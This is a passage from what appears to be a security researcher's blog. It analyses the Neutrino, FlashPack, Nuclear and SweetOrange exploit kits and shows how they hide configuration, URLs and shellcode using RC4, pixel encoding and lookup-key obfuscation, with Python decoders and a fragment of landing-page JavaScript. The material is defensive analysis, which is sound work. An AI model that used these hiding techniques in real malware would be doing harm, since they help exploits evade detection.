<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiroTLtXF0YviLLiIquyq8AnmKKZhrT55zeYRjlEcXvIBQyC3bVnJ-OWsItqrZKEMMqwx-ABlshYf6dpNfjz6Yb-xricfbZ-xBLnPRiBKqkOqe7U50uTAKI6KPI79oDHGZVXexSgTtpbySu/s1600/Dec2014_rtConfig_RC4_key.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiroTLtXF0YviLLiIquyq8AnmKKZhrT55zeYRjlEcXvIBQyC3bVnJ-OWsItqrZKEMMqwx-ABlshYf6dpNfjz6Yb-xricfbZ-xBLnPRiBKqkOqe7U50uTAKI6KPI79oDHGZVXexSgTtpbySu/s1600/Dec2014_rtConfig_RC4_key.PNG" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Neutrino EK Dec 2014 sample - the configuration file RC4 decryption key</span></i></div>
<br />
Alright, we got the key. Now let's find out what happens if we decrypt our data chunk with it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwQIrf9mEsyRxR8V4uRyp3YjzOzdbMtoPvephGby3TfM-7vQ_zWJSTdhJxI2E_llUwwXKKo_NGh20Ydxv2Lft1Fi8AjZd4n3rQ27TLhfG6O2fCEHIy6-Q2PuO4qxSGAFQp-S6I_ihpKEPK/s1600/Dec2014_rtConfig_decrypted.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwQIrf9mEsyRxR8V4uRyp3YjzOzdbMtoPvephGby3TfM-7vQ_zWJSTdhJxI2E_llUwwXKKo_NGh20Ydxv2Lft1Fi8AjZd4n3rQ27TLhfG6O2fCEHIy6-Q2PuO4qxSGAFQp-S6I_ihpKEPK/s1600/Dec2014_rtConfig_decrypted.PNG" height="106" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>Neutrino EK Dec 2014 sample - decrypted configuration file</i></span></div>
<br />
There we go. The configuration file.<br />
<br />
Just to make it a bit clearer why there are many initial payload URLs, let's take a look at the SWF file structure<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeKCYhDZuc1klg3XWxEI_j2-p6nlM81aW6f5CinezrkJn_oFw1NZI4f4C_rfTFELF6hHrCPKVEDu61Tc_WSr7BMUAvKlTZMf_KuUiyXWMTFBV2WhVx3LOOsH0QaycGZXByWx1bOsq3c6VP/s1600/Dec2014_decryptedSWF_structure.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeKCYhDZuc1klg3XWxEI_j2-p6nlM81aW6f5CinezrkJn_oFw1NZI4f4C_rfTFELF6hHrCPKVEDu61Tc_WSr7BMUAvKlTZMf_KuUiyXWMTFBV2WhVx3LOOsH0QaycGZXByWx1bOsq3c6VP/s1600/Dec2014_decryptedSWF_structure.PNG" height="244" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>Neutrino EK Dec 2014 sample - decrypted SWF structure</i></span></div>
<br />
Take a look at the content of the '<span style="color: #3d85c6;">exploit</span>' folder in the screenshot above and note the 5 ActionScript filenames. Each of those scripts contains a routine that decrypts and launches an exploit code for some vulnerability. Now take a look at the tag names for each URL in the configuration file. Besides the first two, the rest of the names match the names of the ActionScripts. So, it appears that each exploit code has a unique URL associated with it to download the initial payload.<br />
<br />
<b><span style="color: #3d85c6;">Focused deception.</span></b><br />
<br />
The Neutrino EK sample analysed in this section was captured in Mar 2015. The landing <a href="http://pastebin.com/b8D5Xsk1" rel="nofollow" target="_blank">page</a> of this sample no longer has an <img> element with encoded data. In fact, it has nothing except the code requesting an SWF file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx8Y4-1M5vMZPZRHEtO1bNy-trrAx-ARuUKXPiuT18i7_AP8mzn9mQej0G96R4_61kQQ5n64zUyzJlofqWAnFX6zSM5dSilmOoGTFAiQM4ZMpHkfHaHMgNe9TyTJp-Io7oFIBK38RxetI8/s1600/Mar2015_landing.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx8Y4-1M5vMZPZRHEtO1bNy-trrAx-ARuUKXPiuT18i7_AP8mzn9mQej0G96R4_61kQQ5n64zUyzJlofqWAnFX6zSM5dSilmOoGTFAiQM4ZMpHkfHaHMgNe9TyTJp-Io7oFIBK38RxetI8/s1600/Mar2015_landing.PNG" height="73" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>Neutrino EK Mar 2015 sample - landing page</i></span></div>
<br />
Into ActionScript code we descend again... until we reach a function that '<span style="color: #3d85c6;">coincidentally</span>' has the same name as in Dec 2014 sample - '<span style="color: #3d85c6;">decodeRtConfig()</span>'<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcNAuc8F2Pi7KAT4DjFn7SwuWcejJc47JnN3_jlgHpuoQUTGopUSF-C098CFbO2wHYSMmtpPPopIlQIrIX7XEbJrVFdjIMwPHuC7c1zLkv4nRSfpAbyOvWTfErpor6emizw1ukt6eIOdUb/s1600/Mar2015_rtConfig_decode_routine.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcNAuc8F2Pi7KAT4DjFn7SwuWcejJc47JnN3_jlgHpuoQUTGopUSF-C098CFbO2wHYSMmtpPPopIlQIrIX7XEbJrVFdjIMwPHuC7c1zLkv4nRSfpAbyOvWTfErpor6emizw1ukt6eIOdUb/s1600/Mar2015_rtConfig_decode_routine.PNG" height="202" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>Neutrino EK Mar 2015 sample - the configuration file decoding routine</i></span></div>
<br />
As expected, there is no code interacting with any data outside of the SWF file, but instead there is a routine that performs some data manipulations with a binary data stored in one of the SWF binary data containers. Let's see what it does:<br />
<ul>
<li>loads data from a binary data container</li>
<li>reads first 3 bytes and converts them into an Integer with radix 16</li>
<li>continues reading the data until bytes count reaches the Integer value</li>
<li>runs the read data through RC4 decryption routine</li>
</ul>
So, simply put, there is a chunk of data that we need to read just a part of and run it through RC4 decryption routine. Now we need to find out how much data we need to read and what the decryption key is. The key is not a problem at all since it can be found in the ActionScript code.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-CqjNgoEK32E5B1EikU87n2eef5a_2fJ6hxVR8ltb9kNYEzJBDrY8jMavMwqXbjEFXQkNhxe13OtLOorVwJk03U_HPQffxEdZeiwonfcXLO5AD3wJerl5l0xQw70lbVrE6Om20vJzG1YA/s1600/Mar2015_rtConfig_RC4_key.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-CqjNgoEK32E5B1EikU87n2eef5a_2fJ6hxVR8ltb9kNYEzJBDrY8jMavMwqXbjEFXQkNhxe13OtLOorVwJk03U_HPQffxEdZeiwonfcXLO5AD3wJerl5l0xQw70lbVrE6Om20vJzG1YA/s1600/Mar2015_rtConfig_RC4_key.PNG" height="60" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>Neutrino EK Mar 2015 sample - the configuration file decryption key</i></span></div>
<br />
For the Integer value of bytes to read we'll have to do some maths magic which will convert the first 3 bytes (0x36 0x32 0x65) into *drums roll*... 1582. Right, now we know how much data to read and the key to decrypt it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHwvZfnwvrBJ_5gXuf-eqCMzje8Yuh73wnP4nJYfJjIjek41tl7OJEvBpimUcSseFVHZdziC5kGQcKhbnT3VXCi914ZDjqHkw1xBvl1F1eNcrStE5rMPl_OkiQK2Q275WNeyoXVGLLuXKB/s1600/Mar2015_rtConfig_decrypted.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHwvZfnwvrBJ_5gXuf-eqCMzje8Yuh73wnP4nJYfJjIjek41tl7OJEvBpimUcSseFVHZdziC5kGQcKhbnT3VXCi914ZDjqHkw1xBvl1F1eNcrStE5rMPl_OkiQK2Q275WNeyoXVGLLuXKB/s1600/Mar2015_rtConfig_decrypted.PNG" height="117" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>Neutrino EK Mar 2015 sample - decrypted configuration file</i></span></div>
<br />
And that's how we deal with this type of data hiding technique.<br />
<br />
<b><span style="color: #3d85c6;">But deception meant to entertain.</span></b><br />
<br />
At the beginning of February 2015 a FlashPack malvertising campaign was making rounds dropping CryptoWall malware.The scheme was rather interesting:<br />
<ul>
<li>browser opens a webpage that requests some advertisement content from an ad TDS</li>
<li>TDS points the browser to an SWF file hosted on RackSpace CDN</li>
<li>browser starts showing the advertisement content that looks absolutely legit</li>
<li>6 minutes later SWF generates a request to download CryptoWall malware</li>
</ul>
Let's take a closer look at this SWF file<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjraWGYKNWGOv69_C0Yu8QDykVmkZI1NGnNZ3F7ulU9sU59JvlE56vRgOY4QwCjF3Nm9wSupTVgT-4ym0JwQjBEiPzPwbLZ3cqG61BPUsYIFoqwRzRDi6b6aji2U7VQIGD8rG3EBWuyx4xh/s1600/Feb2015_FlashPack_injected_SWF.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjraWGYKNWGOv69_C0Yu8QDykVmkZI1NGnNZ3F7ulU9sU59JvlE56vRgOY4QwCjF3Nm9wSupTVgT-4ym0JwQjBEiPzPwbLZ3cqG61BPUsYIFoqwRzRDi6b6aji2U7VQIGD8rG3EBWuyx4xh/s1600/Feb2015_FlashPack_injected_SWF.png" height="320" width="177" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">FlashPack malvertising Feb 2015 sample - SWF with '<span style="color: #3d85c6;">bonus scenes</span>'</span></i></div>
<br />
In a nutshell, there are 2 embedded SWF files each occupying a binary data container. One of them contains some legitimate advertisement content and the other one an exploit code for <a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0569" rel="nofollow" target="_blank">CVE-2014-0569</a>. Let's examine the later one closer.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWxKfX_SleivBheVjfsMYxeRn6azRjmk28kkAvG8P1zIVWl4I9Z_-df4zZOKvb65AYUS9fA0jfPGqEPDchiXMoQgK2uKDM-QcCcUhoe0kNprInb1m3RemGP3bZjNAhrZcP9_otjqKEHeDJ/s1600/Feb2015_FlashPack_initialization.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWxKfX_SleivBheVjfsMYxeRn6azRjmk28kkAvG8P1zIVWl4I9Z_-df4zZOKvb65AYUS9fA0jfPGqEPDchiXMoQgK2uKDM-QcCcUhoe0kNprInb1m3RemGP3bZjNAhrZcP9_otjqKEHeDJ/s1600/Feb2015_FlashPack_initialization.png" height="320" width="219" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<i><span style="font-size: x-small;">FlashPack malvertising Feb 2015 sample - initialization routine</span></i></div>
<br />
After some environment checks, the execution comes to an interesting chain of events(last 2 lines of code in the screenshot above).<br />
<ul>
<li>function '<span style="color: #3d85c6;">images</span>' is called with one argument passed to it</li>
<li>the returned value from '<span style="color: #3d85c6;">images</span>' is passed to '<span style="color: #3d85c6;">decodeurl</span>' function</li>
<li>the returned value from '<span style="color: #3d85c6;">decodeurl</span>' is passed to '<span style="color: #3d85c6;">hex2bin</span>' function</li>
<li>the returned value from '<span style="color: #3d85c6;">hex2bin</span>' is split at '<span style="color: #3d85c6;">&</span>' character</li>
</ul>
<div>
Judging by the function names, we can assume that by passing some data stored in '<span style="color: #3d85c6;">var_29</span>' to '<span style="color: #3d85c6;">images</span>' function we will end up with 2 pieces of data on '<span style="color: #3d85c6;">hex2bin</span>' return - one presumably some URL and the other one unknown yet. So, let's find out what '<span style="color: #3d85c6;">var_29</span>' is.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6vk41EfL68vm2K4fRsQ_gfMN726thk5WOvxcILCAhHuYe7RxFKQtBSp6Xbwh_xIsNACIk4zurrZp0bAjdYJIUalHBnfOj6HZtRR1IAB0lBV5k-IxeQdFnye0LjOJewhmP1f1OZLByYac3/s1600/Feb2015_FlashPack_var_29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6vk41EfL68vm2K4fRsQ_gfMN726thk5WOvxcILCAhHuYe7RxFKQtBSp6Xbwh_xIsNACIk4zurrZp0bAjdYJIUalHBnfOj6HZtRR1IAB0lBV5k-IxeQdFnye0LjOJewhmP1f1OZLByYac3/s1600/Feb2015_FlashPack_var_29.png" height="35" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
'<span style="color: #3d85c6;">var_29</span>' is assigned '<span style="color: #3d85c6;">class_7</span>' object. So, what is this object...</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2L0tXDQ2LYo-H7tirOyXRTy4cT14kZQ698LzT-QLxXh49bZ6Y5PyWvoGzMJU4gDLpHRBCkmh3JbBwTqtel0Mn_2zbZl88bu-tqw9MR4p5k6ohTvYaLFtpu8n5guV8SwZkzuyftVl9gvVj/s1600/Feb2015_FlashPack_class_7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2L0tXDQ2LYo-H7tirOyXRTy4cT14kZQ698LzT-QLxXh49bZ6Y5PyWvoGzMJU4gDLpHRBCkmh3JbBwTqtel0Mn_2zbZl88bu-tqw9MR4p5k6ohTvYaLFtpu8n5guV8SwZkzuyftVl9gvVj/s1600/Feb2015_FlashPack_class_7.png" height="231" width="320" /></a></div>
<div>
<br /></div>
<div>
Ok, '<span style="color: #3d85c6;">class_7</span>' appears to be a '<span style="color: #3d85c6;">BitmapAsset</span>', but which one...</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsNgdd6cbIHSIILkhtEExfI9RLd5cDa0kHqgHk7ZrOOSAYQ7RJsSU_GPtwov1CCSCV0pDid8MYoAxex9v0onM59prbjuYwAT35ahc2L1cehErMVj9DFfvvJ1uNDSID0K97qR1gmN3VoGF_/s1600/Feb2015_FlashPack_class_7_BitmapAsset.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsNgdd6cbIHSIILkhtEExfI9RLd5cDa0kHqgHk7ZrOOSAYQ7RJsSU_GPtwov1CCSCV0pDid8MYoAxex9v0onM59prbjuYwAT35ahc2L1cehErMVj9DFfvvJ1uNDSID0K97qR1gmN3VoGF_/s1600/Feb2015_FlashPack_class_7_BitmapAsset.png" /></a></div>
<div>
<br /></div>
<div>
Alright, '<span style="color: #3d85c6;">var_29</span>' is actually an image file stored in SWF file. Now, let's find out what happens to it when it's passed to '<span style="color: #3d85c6;">images</span>' function.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5yS-3gvTx2Jcerv9GB6eTcaPACpC9QECnbZu9s1KoCXxUcEMOF-FiNLJYcp4gWOpQJVKVeCgu9WayzIvZAtrZnEQnJk96Cow5XWmhe_3XBvH-diy5dVQXCwu4UrKyPAe02T_2-Oky6rKY/s1600/Feb2015_FlashPack_images_function.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5yS-3gvTx2Jcerv9GB6eTcaPACpC9QECnbZu9s1KoCXxUcEMOF-FiNLJYcp4gWOpQJVKVeCgu9WayzIvZAtrZnEQnJk96Cow5XWmhe_3XBvH-diy5dVQXCwu4UrKyPAe02T_2-Oky6rKY/s1600/Feb2015_FlashPack_images_function.png" height="316" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">FlashPack malvertising Feb 2015 sample - '<span style="color: #3d85c6;">images</span>' function</span></i></div>
<div>
<br /></div>
The function is performing the following:<br />
<ul>
<li>extracts image's bitmap data</li>
<li>identifies the number of pixel rows</li>
<li>reads pixel values one by one from each identified row</li>
<li>converts pixels value to a character and adds to a string</li>
</ul>
<div>
Simple enough operation, but let's find out what happens with the resulting string in the '<span style="color: #3d85c6;">decodeurl</span>' function.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpIYp2paEMmRuJXtdvEDeAzkccKORShM_IYuFX2h-JVG4EUp30UjnWl_LkezdmGe_agoD95DiGYOPNrg2ycHl13QYfvNg6fJoLy8mGdpzQebvn0IK4rTDibXThVX9jDpb-Dq_qcBRW4Rer/s1600/Feb2015_FlashPack_decodeurl_function.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpIYp2paEMmRuJXtdvEDeAzkccKORShM_IYuFX2h-JVG4EUp30UjnWl_LkezdmGe_agoD95DiGYOPNrg2ycHl13QYfvNg6fJoLy8mGdpzQebvn0IK4rTDibXThVX9jDpb-Dq_qcBRW4Rer/s1600/Feb2015_FlashPack_decodeurl_function.png" height="145" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">FlashPack malvertising Feb 2015 sample - '<span style="color: #3d85c6;">decodeurl</span>' function</span></i></div>
<br />
This function is performing the following:<br />
<ul>
<li>loops through the string received from '<span style="color: #3d85c6;">images</span>' function character by character</li>
<li>find position of each character in a predefined string - '<span style="color: #3d85c6;">_loc3_</span>'</li>
<li>takes a character in the same position, but from a different string - '<span style="color: #3d85c6;">_loc2_</span>'</li>
<li>adds this character to a new string - '<span style="color: #3d85c6;">_loc4_</span>'</li>
</ul>
<div>
The result of '<span style="color: #3d85c6;">decodeurl</span>' function is expected to be a string of '<span style="color: #3d85c6;">hex</span>' values. So, let's see what happens during the final transformation of what used to be an image file before.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9vQOHrWVeSG5CvPaeUnbHO-k2swCUBHKs7_Iiywtwks42drD2PIS6Hk58qFUawiWTenfF05rj5zaIcmD-bRs1blTo46u92K6UWt2TSQnLa_GoAM0UY5VJRBoIn-NPjvemhQugiY8fdX4Y/s1600/Feb2015_FlashPack_hex2bin_function.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9vQOHrWVeSG5CvPaeUnbHO-k2swCUBHKs7_Iiywtwks42drD2PIS6Hk58qFUawiWTenfF05rj5zaIcmD-bRs1blTo46u92K6UWt2TSQnLa_GoAM0UY5VJRBoIn-NPjvemhQugiY8fdX4Y/s1600/Feb2015_FlashPack_hex2bin_function.png" height="72" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">FlashPack malvertising Feb 2015 sample - '<span style="color: #3d85c6;">hex2bin</span>' function</span></i></div>
<div>
<br /></div>
<div>
'<span style="color: #3d85c6;">hex2bin</span>' function is indeed expecting a string of '<span style="color: #3d85c6;">hex</span>' values that it will loop through reading two characters at the time, convert each pair to a character and add that character to a string.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSPFMoCDA_gNwvi5AfTO3cgJDBHQQmM3_LUWp4I7UwLAn_JIbcLzY_m9nVz_0rsdA8n5roij-vmgstH0U1q2NLMFehcHm3Wd7yfOHgGPCjZ4BTBRT_I96TPp3Q392-nU3rDS0lYrxuwOhH/s1600/meme.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSPFMoCDA_gNwvi5AfTO3cgJDBHQQmM3_LUWp4I7UwLAn_JIbcLzY_m9nVz_0rsdA8n5roij-vmgstH0U1q2NLMFehcHm3Wd7yfOHgGPCjZ4BTBRT_I96TPp3Q392-nU3rDS0lYrxuwOhH/s1600/meme.jpg" height="320" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Exactly my feeling after analyzing this sample</span></i></div>
<br />
Ok, now let's do the same thing in Python and see what happens.<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-7i4QHnMLYorM9r-lDVpXKfgsgAunYOK-IXSfmi8l_lYxCBkgkIO4uernfgdeZRUJDWvLua7SUFqAU39zuiChsZqu6C4mboDe5EXkE2q3iO0GygO0AAqMafxXbJLvfRzPyZSS5cjTB0ND/s1600/Feb2015_FlashPack_decoded_image.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-7i4QHnMLYorM9r-lDVpXKfgsgAunYOK-IXSfmi8l_lYxCBkgkIO4uernfgdeZRUJDWvLua7SUFqAU39zuiChsZqu6C4mboDe5EXkE2q3iO0GygO0AAqMafxXbJLvfRzPyZSS5cjTB0ND/s1600/Feb2015_FlashPack_decoded_image.png" height="47" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">FlashPack malvertising Feb 2015 sample - part of decoded PNG file content</span></i></div>
<br />
'The operation was a complete success!' (c) Dr. Nick Riviera(The Simpsons)<br />
<br />
Our assumption was that at the end of the chained function calls we will have a string that can be broken in 2 at '<span style="color: #3d85c6;">&</span>' character resulting in a URL and something else. Indeed we've got a <a href="https://urlquery.net/report.php?id=1423085400902" rel="nofollow" target="_blank">URL</a> and this something else turned out to be a part of the exploit shellcode.<br />
<br />
That's all for now, folks!<br />
<br />
<b><span style="color: #3d85c6;">Credits</span></b><br />
<br />
<a href="https://twitter.com/kafeine" rel="nofollow" target="_blank">@kafeine</a> - invaluable intelligence sharing<br />
<a href="https://twitter.com/TimoHirvonen" rel="nofollow" target="_blank">@TimoHirvonen</a> - tremendous help with reverse engineering SWF files<br />
<br />
<b><span style="color: #3d85c6;">Tools Used</span></b><br />
<br />
Sulo - <a href="https://github.com/F-Secure/Sulo" rel="nofollow" target="_blank">https://github.com/F-Secure/Sulo</a><br />
JPEXS Free Flash Decompiler - <a href="https://www.free-decompiler.com/flash/" rel="nofollow" target="_blank">https://www.free-decompiler.com/flash/</a><br />
Kahu Security Converter Tool - <a href="http://www.kahusecurity.com/tools/" rel="nofollow" target="_blank">http://www.kahusecurity.com/tools/</a><br />
JetBrains PyCharm - <a href="https://www.jetbrains.com/pycharm/" rel="nofollow" target="_blank">https://www.jetbrains.com/pycharm/</a><br />
Notepad++ - <a href="http://notepad-plus-plus.org/" rel="nofollow" target="_blank">http://notepad-plus-plus.org/</a><br />
<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-14953066134593535142014-09-23T15:26:00.000+01:002014-09-23T15:26:05.172+01:00Deobfuscation tips: Nuclear EK landing pageDISCLAIMER: There isn't a single way to deal with obfuscated data/code. There are many automated and semi-automated tools available to help you with that. In this post though I'll be using none. The aim here is to walk through some code deobfuscation manually. This is not a comprehensive Nuclear EK landing page analysis. Only bits related to data/code obfuscation are covered.<br />
<br />
NOTE: Exploit Kit sample used in this post was captured in September 2014. Taking the ever changing nature of EKs, the described below might not be applicable to the newer variants.<br />
<br />
<span style="color: #3d85c6;"><b>'Nuclear launch detected' </b></span><br />
<br />
I'll be using Nuclear EK landing page sample <a href="http://pastebin.com/rPrghmdJ" rel="nofollow" target="_blank">here</a>. Note a huge blob of numbers stored in '<span style="color: #3d85c6;"><span class="st0">G4Ah</span></span>' variable and a string stored in '<span style="color: #3d85c6;">qjv</span>' variable. The string serves as a lookup key and the numbers blob is actually a sequence of 2 digit numbers that are used to find a character in '<span style="color: #3d85c6;">lookup key</span>' at the position = 2 digits value. The JavaScript on the landing page does quite a simple job - it splits the blob into 2 digits chunks, loops through each chunk value to find the corresponding character in the '<span style="color: #3d85c6;">lookup key</span>' and adds the found character to a string. This might sound a bit confusing, so let's translate it into a Python script to better understand it.<br />
<br />
<pre class="prettyprint">lookupKey = "LOOKUP_KEY_GOES_HERE"
encodedString = "NUMBERS_BLOB_GOES_HERE"
listOfValues = map(''.join, zip(*[iter(encodedString)]*2))
decodedString = ""
for index in range(len(listOfValues)):
if int(listOfValues[index]) < 10:
element = int(listOfValues[index])
else:
element = int(listOfValues[index]) - 2
decodedElement = lookupKey[element]
decodedString += decodedElement
print(decodedString)</pre>
<br />
You'll notice an '<span style="color: #3d85c6;">if</span>' condition in the '<span style="color: #3d85c6;">lookup</span>' loop - for any value greater than 10 subtract 2 from it and then perform the lookup. This is done to compensate for the escape '<span style="color: #3d85c6;">\</span>' characters in the lookup key. I'm not entirely sure why '<span style="color: #3d85c6;">10</span>', but assume the code logic that generates the key will not include characters that require escaping into the first 10 character positions of the key.<br />
<br />
Before we can run the script we need to put the values into '<span style="color: #3d85c6;">lookupKey</span>' and '<span style="color: #3d85c6;">encodedString</span>'. Where the value for '<span style="color: #3d85c6;">encodedString</span>' is hard to miss in the landing page code, the value for '<span style="color: #3d85c6;">lookupKey</span>' might be challenging. From my personal experience with Nuclear EK landings, I found that the characters positions in the key are random, but its size is always 95 characters. The simplest, but not always reliable way to find the lookup key is to search for a variable assigned a long string value. If this method fails you'll have to follow the JavaScript code to find it.<br />
<br />
Now, if we use the corresponding values from our landing page sample and run the script, we get the following <a href="http://pastebin.com/0UAxiCgi" rel="nofollow" target="_blank">output</a>.<br />
<br />
Another <a href="http://en.wikipedia.org/wiki/KISS_principle" rel="nofollow" target="_blank">KISS</a> approach to data obfuscation. Happy deobfuscation!<br />
<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-10325364350042667492014-09-18T17:14:00.000+01:002014-09-18T17:14:39.699+01:00Deobfuscation tips: SweetOrange EK landing page<u>DISCLAIMER</u>: There isn't a single way to deal with obfuscated data/code. There are many automated and semi-automated tools available to help you with that. In this post though I'll be using none. The aim here is to walk through some code deobfuscation manually.This is not a comprehensive SweetOrange EK landing page analysis. Only bits related to data/code obfuscation are covered.<br />
<br />
<u>NOTE</u>: Exploit Kit sample used in this post was captured in September 2014. Taking the ever changing nature of EKs, the described below might not be applicable to the newer variants.<br />
<br />
<span style="color: #3d85c6;"><b>Sweet and Sour</b></span><br />
<br />
I'll be using SweetOrange EK landing page sample <a href="http://pastebin.com/iTVaKmr1" rel="nofollow" target="_blank">here</a>. Note a huge blob of text stored in one of the list items '<span style="color: #3d85c6;"><li></span>' followed by some JavaScript code. We'll skip the general code analysis/overview and focus on the tag. It has '<span style="color: #3d85c6;">id</span>' attribute with a rather unique value - '<span style="color: #3d85c6;">UHOhpWHd</span>'. Searching for this value in the webpage code leads to the following JS function:<br />
<br />
<pre class="prettyprint">function uQqRecfwwf(DDDDDDDDD) {
TLKQDEnOiE = 0;
var ARNTO = uQqRecfwwf;
var DnB = 0;
UhOnd = String(Math.asin);
if (isNaN(UhOnd.match(/aSI/ig))) {
var k = (UhOnd.match(/In/i));
if (k != null) {
iuhquweh = trenoSZ(uyHMzLQ);
XdwrQ["spl" + "ice"](Math.acos(1), 2, "UHOhpWHd");
XdwrQ["spl" + "ice"](1, Math.acos(1), iuhquweh);
ardddds = DDDDDDDDD;
DnB = cXEcJlM()[qqTbFg()];
};
};
return DnB;
}</pre>
<br />
At this stage it's unclear what exactly happens to the blob's data rather then being stored in '<span style="color: #3d85c6;">XdwrQ</span>' array. Before we start chasing the rabbit down the rabbit's hole and submerge into other functions, let's find out what calls '<span style="color: #3d85c6;">uQqRecfwwf</span>' function.<br />
<br />
<pre class="prettyprint">aCaBOUakjB = uQqRecfwwf(BFG423SDFFSDF);</pre>
<br />
Ok, it's being called during a variable initialization. Are there any operations on this variable after the function call returns?<br />
<br />
<pre class="prettyprint">JvUhBCJkFV = aCaBOUakjB.substring(Math.acos(1) + 70).replace(/AdgSf344_42/, "");</pre>
<br />
